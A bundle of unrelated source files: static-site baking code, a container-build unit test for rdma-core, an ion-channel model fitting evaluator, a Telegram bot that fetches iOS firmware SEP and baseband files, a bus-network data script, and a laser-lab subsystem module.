logger.info(format_timed(
start_time, "%d jobs completed (%s)." %
(job_count, ', '.join(
['%s %s' % (d, ', '.join(sn))
for d, sn in job_descs.items()]))))
def _logErrors(self, item_spec, errors):
logger.error("Errors found in %s:" % item_spec)
for e in errors:
logger.error(" " + e)
def _logWorkerException(self, item_spec, exc_data):
logger.error("Errors found in %s:" % item_spec)
logger.error(exc_data['value'])
if self.app.debug:
logger.error(exc_data['traceback'])
def _createWorkerPool(self, previous_records_path, pool_userdata):
from piecrust.workerpool import WorkerPool
from piecrust.baking.worker import BakeWorkerContext, BakeWorker
worker_count = self.app.config.get('baker/workers')
batch_size = self.app.config.get('baker/batch_size')
ctx = BakeWorkerContext(
self.appfactory,
self.out_dir,
force=self.force,
previous_records_path=previous_records_path,
allowed_pipelines=self.allowed_pipelines,
forbidden_pipelines=self.forbidden_pipelines)
pool = WorkerPool(
worker_count=worker_count,
batch_size=batch_size,
worker_class=BakeWorker,
initargs=(ctx,),
callback=self._handleWorkerResult,
error_callback=self._handleWorkerError,
userdata=pool_userdata)
return pool
def _handleWorkerResult(self, job, res, userdata):
cur_pass = userdata.cur_pass
source_name, item_spec = job['job_spec']
# Make the pipeline do custom handling to update the record entry.
ppinfo = userdata.ppmngr.getPipelineInfo(source_name)
pipeline = ppinfo.pipeline
record = ppinfo.current_record
ppmrctx = PipelineJobResultHandleContext(record, job, cur_pass)
pipeline.handleJobResult(res, ppmrctx)
# Set the overall success flags if there was an error.
record_entry = ppmrctx.record_entry
if not record_entry.success:
record.success = False
userdata.records.success = False
self._logErrors(job['item_spec'], record_entry.errors)
def _handleWorkerError(self, job, exc_data, userdata):
# Set the overall success flag.
source_name, item_spec = job['job_spec']
ppinfo = userdata.ppmngr.getPipelineInfo(source_name)
pipeline = ppinfo.pipeline
record = ppinfo.current_record
record.success = False
userdata.records.success = False
# Add those errors to the record, if possible.
record_entry_spec = job.get('record_entry_spec', item_spec)
e = record.getEntry(record_entry_spec)
if not e:
e = pipeline.createRecordEntry(item_spec)
record.addEntry(e)
e.errors.append(exc_data['value'])
self._logWorkerException(item_spec, exc_data)
# Log debug stuff.
if self.app.debug:
logger.error(exc_data['traceback'])
class _PoolUserData:
def __init__(self, baker, ppmngr):
self.baker = baker
self.ppmngr = ppmngr
self.records = ppmngr.record_histories.current
self.cur_pass = 0
def _get_pipeline_infos_by_pass_and_realm(pp_infos):
pp_by_pass_and_realm = {}
for pp_info in pp_infos:
pp_pass_num = pp_info.pipeline.PASS_NUM
if isinstance(pp_pass_num, list):
for ppn in pp_pass_num:
_add_pipeline_info_to_pass_and_realm_dict(
ppn, pp_info, pp_by_pass_and_realm)
else:
_add_pipeline_info_to_pass_and_realm_dict(
pp_pass_num, pp_info, pp_by_pass_and_realm)
return pp_by_pass_and_realm
def _add_pipeline_info_to_pass_and_realm_dict(pp_pass_num, pp_info,
pp_by_pass_and_realm):
pp_by_realm = pp_by_pass_and_realm.setdefault(pp_pass_num, {})
pplist = pp_by_realm.setdefault(
pp_info.pipeline.source.config['realm'], [])
pplist.append(pp_info)
def _merge_execution_stats(base_stats, *other_stats):
total_stats = ExecutionStats()
total_stats.mergeStats(base_stats)
for ps in other_stats:
if ps is not None:
total_stats.mergeStats(ps)
return total_stats
def _save_bake_records(records, records_path, *, rotate_previous):
if rotate_previous:
records_dir, records_fn = os.path.split(records_path)
records_id, _ = os.path.splitext(records_fn)
for i in range(8, -1, -1):
suffix = '' if i == 0 else '.%d' % i
records_path_i = os.path.join(
records_dir,
'%s%s.records' % (records_id, suffix))
if os.path.exists(records_path_i):
records_path_next = os.path.join(
records_dir,
'%s.%s.records' % (records_id, i + 1))
if os.path.exists(records_path_next):
os.remove(records_path_next)
os.rename(records_path_i, records_path_next)
with format_timed_scope(logger, "saved bake records.",
level=logging.DEBUG, colored=False):
records.save(records_path)
|
<reponame>robertmaynard/hpc-container-maker
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=invalid-name, too-few-public-methods, bad-continuation
"""Test cases for the rdma_core module"""
from __future__ import unicode_literals
from __future__ import print_function
import logging # pylint: disable=unused-import
import unittest
from helpers import centos, docker, ubuntu, x86_64
from hpccm.building_blocks.rdma_core import rdma_core
class Test_rdma_core(unittest.TestCase):
def setUp(self):
"""Disable logging output messages"""
logging.disable(logging.ERROR)
@x86_64
@ubuntu
@docker
def test_defaults_ubuntu(self):
"""Default rdma_core building block"""
r = rdma_core()
self.assertEqual(str(r),
r'''# RDMA Core version 31.2
RUN apt-get update -y && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
libnl-3-dev \
libnl-route-3-dev \
libudev-dev \
make \
pandoc \
pkg-config \
python3-docutils \
wget && \
rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp https://github.com/linux-rdma/rdma-core/archive/v31.2.tar.gz && \
mkdir -p /var/tmp && tar -x -f /var/tmp/v31.2.tar.gz -C /var/tmp -z && \
mkdir -p /var/tmp/rdma-core-31.2/build && cd /var/tmp/rdma-core-31.2/build && cmake -DCMAKE_INSTALL_PREFIX=/usr/local/rdma-core /var/tmp/rdma-core-31.2 && \
cmake --build /var/tmp/rdma-core-31.2/build --target all -- -j$(nproc) && \
cmake --build /var/tmp/rdma-core-31.2/build --target install -- -j$(nproc) && \
rm -rf /var/tmp/rdma-core-31.2 /var/tmp/v31.2.tar.gz
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
LD_LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LD_LIBRARY_PATH \
LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
PATH=/usr/local/rdma-core/bin:$PATH''')
@x86_64
@centos
@docker
def test_defaults_centos(self):
"""Default rdma_core building block"""
r = rdma_core()
self.assertEqual(str(r),
r'''# RDMA Core version 31.2
RUN yum install -y epel-release && \
yum install -y \
libnl3-devel \
libudev-devel \
make \
pandoc \
pkgconfig \
python-docutils \
wget && \
rm -rf /var/cache/yum/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp https://github.com/linux-rdma/rdma-core/archive/v31.2.tar.gz && \
mkdir -p /var/tmp && tar -x -f /var/tmp/v31.2.tar.gz -C /var/tmp -z && \
mkdir -p /var/tmp/rdma-core-31.2/build && cd /var/tmp/rdma-core-31.2/build && cmake -DCMAKE_INSTALL_PREFIX=/usr/local/rdma-core /var/tmp/rdma-core-31.2 && \
cmake --build /var/tmp/rdma-core-31.2/build --target all -- -j$(nproc) && \
cmake --build /var/tmp/rdma-core-31.2/build --target install -- -j$(nproc) && \
rm -rf /var/tmp/rdma-core-31.2 /var/tmp/v31.2.tar.gz
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
LD_LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LD_LIBRARY_PATH \
LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
PATH=/usr/local/rdma-core/bin:$PATH''')
@x86_64
@ubuntu
@docker
def test_ldconfig(self):
"""ldconfig option"""
r = rdma_core(ldconfig=True, version='31.2')
self.assertEqual(str(r),
r'''# RDMA Core version 31.2
RUN apt-get update -y && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
libnl-3-dev \
libnl-route-3-dev \
libudev-dev \
make \
pandoc \
pkg-config \
python3-docutils \
wget && \
rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp https://github.com/linux-rdma/rdma-core/archive/v31.2.tar.gz && \
mkdir -p /var/tmp && tar -x -f /var/tmp/v31.2.tar.gz -C /var/tmp -z && \
mkdir -p /var/tmp/rdma-core-31.2/build && cd /var/tmp/rdma-core-31.2/build && cmake -DCMAKE_INSTALL_PREFIX=/usr/local/rdma-core /var/tmp/rdma-core-31.2 && \
cmake --build /var/tmp/rdma-core-31.2/build --target all -- -j$(nproc) && \
cmake --build /var/tmp/rdma-core-31.2/build --target install -- -j$(nproc) && \
echo "/usr/local/rdma-core/lib" >> /etc/ld.so.conf.d/hpccm.conf && ldconfig && \
rm -rf /var/tmp/rdma-core-31.2 /var/tmp/v31.2.tar.gz
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
PATH=/usr/local/rdma-core/bin:$PATH''')
@x86_64
@ubuntu
@docker
def test_git_repository_true(self):
r = rdma_core(repository=True)
self.assertEqual(str(r),
r'''# RDMA Core https://github.com/linux-rdma/rdma-core.git
RUN apt-get update -y && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
ca-certificates \
git \
libnl-3-dev \
libnl-route-3-dev \
libudev-dev \
make \
pandoc \
pkg-config \
python3-docutils \
wget && \
rm -rf /var/lib/apt/lists/*
RUN mkdir -p /var/tmp && cd /var/tmp && git clone --depth=1 https://github.com/linux-rdma/rdma-core.git rdma-core && cd - && \
mkdir -p /var/tmp/rdma-core/build && cd /var/tmp/rdma-core/build && cmake -DCMAKE_INSTALL_PREFIX=/usr/local/rdma-core /var/tmp/rdma-core && \
cmake --build /var/tmp/rdma-core/build --target all -- -j$(nproc) && \
cmake --build /var/tmp/rdma-core/build --target install -- -j$(nproc) && \
rm -rf /var/tmp/rdma-core
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
LD_LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LD_LIBRARY_PATH \
LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
PATH=/usr/local/rdma-core/bin:$PATH''')
@ubuntu
@docker
def test_runtime(self):
"""Runtime"""
r = rdma_core()
r2 = r.runtime()
self.assertEqual(r2,
r'''# RDMA Core
RUN apt-get update -y && \
DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
libnl-3-200 \
libnl-route-3-200 \
libnuma1 && \
rm -rf /var/lib/apt/lists/*
COPY --from=0 /usr/local/rdma-core /usr/local/rdma-core
ENV CPATH=/usr/local/rdma-core/include:$CPATH \
LD_LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LD_LIBRARY_PATH \
LIBRARY_PATH=/usr/local/rdma-core/lib:/usr/local/rdma-core/lib64:$LIBRARY_PATH \
PATH=/usr/local/rdma-core/bin:$PATH''')
|
import numpy as np
from cwFitter import Simulator
class Evaluator(object):
def __init__(self, sampleData, sim_params, bio_params):
self.sampleData = sampleData
self.sim_params = sim_params
self.bio_params = bio_params
if 'protoco_start_I' in sim_params:
self.steps = np.arange(sim_params['protocol_start_I'], sim_params['protocol_end_I'], sim_params['protocol_steps_I'])
else:
self.steps = np.arange(sim_params['protocol_start'], sim_params['protocol_end'], sim_params['protocol_steps'])
def evaluate(self, candidates, args):
"""
Runs VClamp and/or IClamp simulation to calculate the cost value for each candidate.
I/V curve is also considered as an evaluation factor and coming from VClamp or IClamp simulations.
The approach is based on Gurkiewicz & Korngreen study (doi:10.1371/journal.pcbi.0030169.)
:return: total_cost
"""
#TODO: Include weights and minimization function (e.g. prAxis)
#Based on Gurkiewicz & Korngreen approach (doi:10.1371/journal.pcbi.0030169.)
fitness = 1e10
total_fitness = []
Vcost = 0
Icost = 0
IVcost = 0
IVFlag = False
samples = 0
for candidate in candidates:
cand_var = dict(zip(self.bio_params['channel_params'],candidate))
cell_var = dict(zip(self.bio_params['cell_params'],self.bio_params['val_cell_params']))
mySimulator = Simulator.Simulator(self.sim_params,cand_var,cell_var)
if ('VClamp' in self.sampleData) or (('IV' in self.sampleData) and (('VClamp' and 'IClamp') not in self.sampleData)):
VClampSim_t,VClampSim_I,VClampSim_Vmax,VClampSim_Imax = mySimulator.VClamp()
tempCost = 0
M = 0
N = 0
if 'VClamp' in self.sampleData:
for trace in self.sampleData['VClamp']['traces']:
index = int((trace['vol'] - self.sim_params['protocol_start']) / self.sim_params['protocol_steps'])
if VClampSim_I[index] :
tempCost , N = self.cost([VClampSim_t,VClampSim_I[index]],[trace['t'],trace['I']])
Vcost += tempCost
N += N
M += 1
if (N * M) != 0:
Vcost /= (N * M)
samples += 1
if 'IV' in self.sampleData:
IVcost , N = self.cost([VClampSim_Vmax,VClampSim_Imax],[self.sampleData['IV']['V'],self.sampleData['IV']['I']])
if N != 0:
IVcost /= N
IVFlag = True
samples += 1
if 'IClamp' in self.sampleData:
IClampSim_t,IClampSim_v,IClampSim_Vmax,IClampSim_Imax = mySimulator.IClamp()
tempCost = 0
M = 0
N = 0
for trace in self.sampleData['IClamp']['traces']:
index = int((trace['amp'] - self.sim_params['protocol_start_I']) / self.sim_params['protocol_steps_I'])
if IClampSim_v[index]:
tempCost , N = self.cost([IClampSim_t,IClampSim_v[index]],[trace['t'],trace['V']])
Icost += tempCost
N += N
M += 1
if (N * M) != 0:
Icost /= (N * M)
samples += 1
if IVFlag == False and 'IV' in self.sampleData:
IVcost , N = self.cost([IClampSim_Vmax,IClampSim_Imax],[self.sampleData['IV']['V'],self.sampleData['IV']['I']])
if N != 0:
IVcost /= N
IVFlag = True
samples += 1
fitness = (Vcost + Icost + IVcost) / samples
total_fitness.append(fitness)
return total_fitness
def cost(self, sim, target):
"""
Get simulation data and target data (experimental/digitazed) to calculate cost.
Cost function calculation is based on Gurkiewicz & Korngreen approach (doi:10.1371/journal.pcbi.0030169.)
:return:
"""
#TODO: a better way to calculate cost is to measure the area between two plots!!
sim_x = sim[0]
cost_val = 1e9
N = 0
for target_x in target[0]:
index = sim_x.index(min(sim_x, key=lambda x:abs(x-target_x))) #TODO: check if the distance is in a reasonable range (consider a sigma)
if sim[1][index]:
#if there is a comparable data and it's the first time, initialize the cost value with zero to calculate the total cost
#else return a big number, to ignore this candidate
if cost_val == 1e9: cost_val = 0
sim_y = sim[1][index]
target_y = target[1][target[0].index(target_x)] #TODO: look for a better way to work with indices
cost_val += (target_y - sim_y)**2 #TODO: normalize distance
N += 1
return cost_val , N
|
#!/usr/bin/env python3
import argparse
import html
import logging
import os
import plistlib
import subprocess
import tempfile
import time
import urllib.parse
import zipfile
from enum import Enum
from io import BytesIO
from pathlib import Path
import requests
import toml
from packaging import version
from telegram import ChatAction, InlineKeyboardButton, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove
from telegram.ext import CallbackQueryHandler, CommandHandler, Filters, MessageHandler, Updater
DEVICE_TYPES = {
'iPhone': 'iPhone',
'iPad': 'iPad',
'iPod touch': 'iPod',
'Apple TV': 'AppleTV',
}
class State(Enum):
NONE = 0
DEVICE_TYPE = 1
DEVICE_MODEL = 2
BOARD_CONFIG = 3
FIRMWARE = 4
def sepbb(update, ctx):
update.message.reply_text('Please select a device type.', reply_markup=ReplyKeyboardMarkup([
[
'iPhone',
'iPad',
],
[
'iPod touch',
'Apple TV',
],
]))
ctx.user_data.clear()
ctx.user_data['state'] = State.DEVICE_TYPE
def on_text(update, ctx):
ctx.user_data.setdefault('state', State.NONE)
text = update.message.text
if ctx.user_data['state'] == State.DEVICE_TYPE:
try:
device_type = DEVICE_TYPES[text]
except KeyError:
return update.message.reply_text('Invalid input.')
r = session.get('https://api.ipsw.me/v4/devices')
if not r.ok:
return update.message.reply_text('Unable to communicate with ipsw.me API, please try again later.')
ctx.bot_data['devices'] = r.json()
devices = [x for x in ctx.bot_data['devices'] if x['identifier'].startswith(device_type)]
if not devices:
return update.message.reply_text(
'No devices found. Please start over using /start.', reply_markup=ReplyKeyboardRemove(),
)
keyboard = []
for i, device in enumerate(devices):
if i % 2 == 0:
keyboard.append([])
keyboard[-1].append(device['name'])
update.message.reply_text('Please select a device.', reply_markup=ReplyKeyboardMarkup(keyboard))
ctx.user_data['state'] = State.DEVICE_MODEL
elif ctx.user_data['state'] == State.DEVICE_MODEL:
try:
device = next(x for x in ctx.bot_data['devices'] if x['name'] == text)
except StopIteration:
return update.message.reply_text('Invalid input.')
r = session.get(f'https://api.ipsw.me/v4/device/{device["identifier"]}')
rb = session.get(f'https://api.m1sta.xyz/betas/{device["identifier"]}')
if r.ok:
device = r.json()
ctx.bot_data['ipswme_failed'] = False
else:
device = {
'name': device['name'],
'identifier': device['identifier'],
'boards': device['boards'],
'firmwares': [],
}
update.message.reply_text('Unable to communicate with ipsw.me API.')
ctx.user_data['ipswme_failed'] = True
if rb.ok:
device_beta = rb.json()
device['firmwares'] += device_beta
else:
update.message.reply_text('Unable to communicate with the beta API.')
if ctx.user_data['ipswme_failed']:
return update.message.reply_text('Please try again later.', reply_markup=ReplyKeyboardRemove())
# Filter out DEV boards
boards = [x['boardconfig'] for x in device['boards'] if x['boardconfig'].lower().endswith('ap')]
if not boards:
return update.message.reply_text('No boardconfigs found for this device.')
ctx.user_data['device'] = device
if len(boards) > 1:
keyboard = []
for i, board in enumerate(boards):
if i % 2 == 0:
keyboard.append([])
keyboard[-1].append(board)
update.message.reply_text(
'Please select your board config.\n\n'
'You can get this using the System Info tweak or AIDA64 from the App Store.',
reply_markup=ReplyKeyboardMarkup(keyboard),
)
ctx.user_data['state'] = State.BOARD_CONFIG
else:
ctx.user_data['boardconfig'] = boards[0]
show_firmware_menu(update, ctx)
elif ctx.user_data['state'] == State.BOARD_CONFIG:
if not text.lower().endswith('ap'):
return update.message.reply_text('Invalid input.')
ctx.user_data['boardconfig'] = text
show_firmware_menu(update, ctx)
elif ctx.user_data['state'] == State.FIRMWARE:
if 'device' not in ctx.user_data or 'boardconfig' not in ctx.user_data:
return update.message.reply_text(
'Invalid state. Please start over using /start.', reply_markup=ReplyKeyboardRemove()
)
try:
firmware = ctx.user_data['firmware'] = next(
x for x in ctx.user_data['device']['firmwares'] if x['version'] == text
)
except StopIteration:
return update.message.reply_text('Invalid input.')
p = urllib.parse.urlparse(firmware['url'])
if p.netloc == 'appldnld.apple.com':
ctx.user_data['buildmanifest'] = pzb(update, ctx, firmware, 'BuildManifest.plist', 'BuildManifest')
else:
buildmanifest_url = urllib.parse.urlunparse(
p._replace(path='/'.join([*p.path.split('/')[:-1], 'BuildManifest.plist']))
)
r = session.get(buildmanifest_url)
if r.ok:
ctx.user_data['buildmanifest'] = r.content
else:
ctx.user_data['buildmanifest'] = pzb(
update, ctx, ctx.user_data['firmware'], 'BuildManifest.plist', 'BuildManifest'
)
try:
buildmanifest = plistlib.loads(ctx.user_data['buildmanifest'])
except Exception:
update.message.reply_text('Unable to parse BuildManifest, please try again later.')
raise
try:
buildidentity = next(
x for x in buildmanifest['BuildIdentities']
if x['Info']['DeviceClass'].lower() == ctx.user_data['boardconfig'].lower()
)
if 'RestoreSEP' in buildidentity['Manifest']:
sep_path = ctx.user_data['sep_path'] = buildidentity['Manifest']['RestoreSEP']['Info']['Path']
else:
sep_path = ctx.user_data['sep_path'] = None
if 'BasebandFirmware' in buildidentity['Manifest']:
bb_path = ctx.user_data['bb_path'] = buildidentity['Manifest']['BasebandFirmware']['Info']['Path']
else:
bb_path = ctx.user_data['bb_path'] = None
except Exception:
update.message.reply_text('Unable to get data from BuildManifest, please try again later.')
raise
try:
update.message.reply_text(
'Removing keyboard... (ignore this message)',
reply_markup=ReplyKeyboardRemove(),
).delete()
except Exception:
pass
update.message.reply_text(
('<b>{device} ({boardconfig}) - {firmware} ({buildid})</b>\n\n'
'<b>SEP</b>: {sep_path}\n'
'<b>Baseband</b>: {bb_path}').format(
device=html.escape(ctx.user_data['device']['name']),
boardconfig=html.escape(ctx.user_data['boardconfig']),
firmware=html.escape(firmware['version']),
buildid=html.escape(firmware['buildid']),
sep_path=html.escape(str(sep_path)),
bb_path=html.escape(str(bb_path)),
),
parse_mode='html',
reply_markup=InlineKeyboardMarkup([
[
InlineKeyboardButton("Download", callback_data="download"),
],
]),
)
else:
update.message.reply_text('Invalid state. Please start over using /start.', reply_markup=ReplyKeyboardRemove())
def on_callback_query(update, ctx):
if update.callback_query.data == 'download':
zf = BytesIO()
zf.name = f'sepbb_{ctx.user_data["boardconfig"]}_{ctx.user_data["firmware"]["buildid"]}.zip'
with zipfile.ZipFile(zf, 'w') as zfd:
buildmanifest = ctx.user_data['buildmanifest']
zfd.writestr('BuildManifest.plist', buildmanifest)
if ctx.user_data['sep_path']:
sep = pzb(update, ctx, ctx.user_data['firmware'], ctx.user_data['sep_path'], 'SEP')
if sep:
zfd.writestr(ctx.user_data['sep_path'], sep)
if ctx.user_data['bb_path']:
baseband = pzb(update, ctx, ctx.user_data['firmware'], ctx.user_data['bb_path'], 'Baseband')
if baseband:
zfd.writestr(ctx.user_data['bb_path'], baseband)
zf.seek(0)
update.message.reply_document(zf.read(), zf.name)
ctx.bot.answer_callback_query(update.callback_query.id)
def show_firmware_menu(update, ctx):
if 'device' not in ctx.user_data:
return update.message.reply_text(
'Invalid state. Please start over using /start.', reply_markup=ReplyKeyboardRemove(),
)
firmwares = [x for x in ctx.user_data['device']['firmwares'] if x.get('signed')]
if not firmwares:
return update.message.reply_text('No signed firmwares found for this device.')
firmwares = sorted(
firmwares,
key=lambda x: version.parse(
x['version'].replace(' ', '') + ('1' if x['version'].lower().endswith(('beta', 'rc')) else '')
),
)
keyboard = []
for i, firmware in enumerate(firmwares):
if i % 2 == 0:
keyboard.append([])
keyboard[-1].append(firmware['version'])
update.message.reply_text(
'Please select a version.\n(Only currently signed versions are shown.)',
reply_markup=ReplyKeyboardMarkup(keyboard),
)
ctx.user_data['state'] = State.FIRMWARE
def pzb(update, ctx, firmware, file, name):
update.message = update.message or update.callback_query.message
update.message.reply_text(f'Extracting {name}, please wait...')
with tempfile.TemporaryDirectory() as d:
oldcwd = Path.cwd()
os.chdir(d)
p = subprocess.Popen(['pzb', firmware['url'], '-g', file])
while p.poll() is None:
ctx.bot.send_chat_action(chat_id=update.effective_message.chat_id, action=ChatAction.TYPING)
time.sleep(1)
os.chdir(oldcwd)
f = Path(d) / Path(file).name
if not f.exists():
update.message.reply_text(
f'Unable to extract {name} for the selected firmware, please try again later.'
)
return
return f.read_bytes()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true', help='enable debug logging')
args = parser.parse_args()
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.DEBUG if args.debug else logging.INFO,
)
config = toml.load('config.toml')
updater = Updater(config['token'])
dispatcher = updater.dispatcher
session = requests.Session()
dispatcher.add_handler(CommandHandler('start', sepbb))
dispatcher.add_handler(CommandHandler('sep', sepbb))
dispatcher.add_handler(CommandHandler('sepbb', sepbb))
dispatcher.add_handler(MessageHandler(Filters.text, on_text))
dispatcher.add_handler(CallbackQueryHandler(on_callback_query))
updater.start_polling()
|
<filename>SiouxFallNet/BaseNet&PyProcess/process.py
"""
This code is created process the bus network data
"""
import pandas as pd
num_bus_line = 10
max_bus_stops = 11
class LinkClass:
def __init__(self,_a,_b,_t):
self.tail =_a
self.head =_b
self.cost =_t
class ODClass:
def __init__(self,_o,_d,_val):
self.origin =_o
self.dest = _d
self.demand = _val
# Step 1: Read created bus set
bus_stops = []
df = pd.read_csv("BusSet.csv",header=None)
all_bus_stos = []
for b in range(0,num_bus_line):
stops = []
for s in range(0,max_bus_stops):
stops.append(df[s][b])
bus_stops.append(stops)
print(bus_stops[-1])
# Step 2: Write Bus Stop
bus_num = 1
with open("Stops.txt","w") as f:
for b in range(0, num_bus_line):
# print("{0}".format(bus_num),end=' ',file = f)
for s in range(0,len(bus_stops[b])-1):
print("{0}".format(bus_stops[b][s]),end=' ',file=f)
print("{0}".format(bus_stops[b][-1]),file=f)
bus_num=bus_num+1
all_bus_stos.append(bus_stops[b])
for b in range(num_bus_line,0,-1):
# print("{0}".format(bus_num),end=' ',file = f)
line = []
line.append(bus_num)
for s in range(len(bus_stops[b-1]),1,-1):
if bus_stops[b-1][s-1]!=0:
line.append(bus_stops[b-1][s-1])
if len(line)<max_bus_stops:
for i in range(0,max_bus_stops-len(line)-1):
line.append(0)
all_bus_stos.append(line)
print(line)
for s in range(0,len(line)-1):
print("{0}".format(line[s]),file=f,end=" ")
print("{0}".format(line[-1]),file=f)
bus_num=bus_num+1
print("**************Chekck all bus stops")
for b in all_bus_stos:
print(b)
# Step 3 generate leg seg data
linkid = pd.read_csv("linkdata.txt",header=None,delimiter=r"\s+")
cost =pd.read_csv("t0.txt",header=None)
num_row = linkid.shape[0]
print("num row = {0}".format(num_row))
links = []
for r in range(0,num_row):
tail = linkid[0][r]+1
head = linkid[1][r]+1
t = cost[0][r]
links.append(LinkClass(tail,head,t))
for l in links:
print("{0},{1},{2}".format(l.tail,l.head,l.cost))
print("***************Check Line Seg Data***********")
with open("LineSegData.txt","w") as f:
for b in all_bus_stos:
seg = 1
for i in range(1,len(b)-1):
now = b[i]
next_stop = b[i+1]
if now!=0 and next_stop!=0:
print("{0}".format(b[0]),end=" ",file=f)
# print("Now = {0}, next = {1}".format(now, next_stop))
x =[c for c in links if c.tail==now and c.head==next_stop]
print("{0}".format(seg),end=" ",file=f)
seg = seg +1
print("{0}".format(x[0].cost),end=" ",file=f)
print("0",end=" ",file=f) #variance
print("1",file=f) # fare value set to be 1
used_nodes =[False]*25
odf = pd.read_csv("AllOd.txt",header=None,delimiter=r"\s+")
od = []
num_row = odf.shape[0]
for r in range(0, num_row):
origin = odf[0][r]
dest = odf[1][r]
val = odf[2][r]
print("Origin = {0}, Dest = {1}, Val = {2}".format(origin,dest,val))
od.append(ODClass(origin,dest,val))
for b in all_bus_stos:
for s in range(1,len(b)):
if b[s]!=0:
used_nodes[b[s]]=True
for n in range(0,len(used_nodes)):
if used_nodes[n]:
print(n)
new_od = []
for w in od:
if used_nodes[w.origin] and used_nodes[w.dest]:
new_od.append(ODClass(w.origin,w.dest,w.demand))
|
<reponame>trimitri/jokarus
"""The Subsystems class manages the connection to internal subsystems.
This is an interface to the actual things connected to each port of each
subsystem.
SAFETY POLICY: This class silently assumes all passed arguments to be of
correct type. The values are allowed to be wrong, though.
"""
import asyncio
from collections import namedtuple
import enum
from functools import partial
import logging
import time
from typing import Dict, List, Tuple, Union
from . import lock_buddy # for type annotations # pylint: disable=unused-import
from .temperature_ramp import TemperatureRamp
from ..drivers import ecdl_mopa, dds9_control, menlo_stack, mccdaq, ms_ntc
from ..util import asyncio_tools as tools
from .. import logger
from .. import constants as cs
LOGGER = logging.getLogger("pyodine.controller.subsystems") # logging.Logger
LOGGER.setLevel(logging.DEBUG)
# TODO: Drop this and use `TecUnit` below instead.
TEC_CONTROLLERS = {'miob': 1, 'vhbg': 2, 'shgb': 3, 'shga': 4}
LOCKBOX_ID = 2
DDS_PORT = '/dev/ttyUSB2'
# Define some custom types.
# pylint: disable=invalid-name
MenloUnit = Union[float, int]
# Measurement (time, reading)
DataPoint = Tuple[float, MenloUnit]
Buffer = List[DataPoint]
# pylint: enable=invalid-name
class AuxTemp(enum.IntEnum):
"""How to index the array returned by `get_aux_temps()`?"""
# Keep this synchronized with `get_aux_temps()`!
CELL = 0
LD_MO = 1
LD_PA = 2
SHG = 3
MENLO = 4
AOM_AMP = 5
HEATSINK_A = 6 # sensor closer to the side
HEATSINK_B = 7 # sensor closer to the back
class DaqInput: # pylint: disable=too-few-public-methods
"""The MCC USB1608G-2AO features 16 analog inputs.
Static constants container. Don't instanciate."""
DETECTOR_LOG = mccdaq.DaqChannel.C_6
DETECTOR_PUMP = mccdaq.DaqChannel.C_14
ERR_SIGNAL = mccdaq.DaqChannel.C_7
NTC_AOM_AMP = mccdaq.DaqChannel.C_10
NTC_CELL = mccdaq.DaqChannel.C_0
NTC_HEATSINK_A = mccdaq.DaqChannel.C_1 # sensor closer to the side
NTC_HEATSINK_B = mccdaq.DaqChannel.C_9 # sensor closer to the back
NTC_MENLO = mccdaq.DaqChannel.C_3
NTC_MO = mccdaq.DaqChannel.C_12
NTC_PA = mccdaq.DaqChannel.C_2
NTC_SHG = mccdaq.DaqChannel.C_8
PD_AUX = mccdaq.DaqChannel.C_13 # MiLas aux. output (MO basically)
PD_MIOB = mccdaq.DaqChannel.C_5 # MiLas power tap on MiOB
RAMP_MONITOR = mccdaq.DaqChannel.C_11
REF_5V = mccdaq.DaqChannel.C_4
class DdsChannel(enum.IntEnum):
"""The four channels of the DDS device."""
AOM = 1
EOM = 0
MIXER = 2
FREE = 3 # not in use
class LdDriver(enum.IntEnum):
"""Card indices of current drivers used.
To ensure backwards compatibility, the values equal the "unit numbers" of
the respective OSC cards. For new code, however, no assumptions about the
enum values should be made.
"""
MASTER_OSCILLATOR = 1
POWER_AMPLIFIER = 3
LightSensors = namedtuple('LightSensors', 'MIOB AUX PUMP LOG')
LIGHT_SENSOR_CHANNELS = LightSensors(DaqInput.PD_MIOB, DaqInput.PD_AUX,
DaqInput.DETECTOR_PUMP, DaqInput.DETECTOR_LOG)
LIGHT_SENSOR_GAINS = LightSensors(mccdaq.InputRange.PM_2V, mccdaq.InputRange.PM_2V,
mccdaq.InputRange.PM_5V, mccdaq.InputRange.PM_5V)
class Tuners: # pylint: disable=too-few-public-methods
"""The usable tuners exposed by the system.
This is a static class whose members need to explicitly set from the
outside, as they are None otherwise.
"""
MO = None # type: lock_buddy.Tuner
"""Master oscillator diode current."""
MIOB = None # type: lock_buddy.Tuner
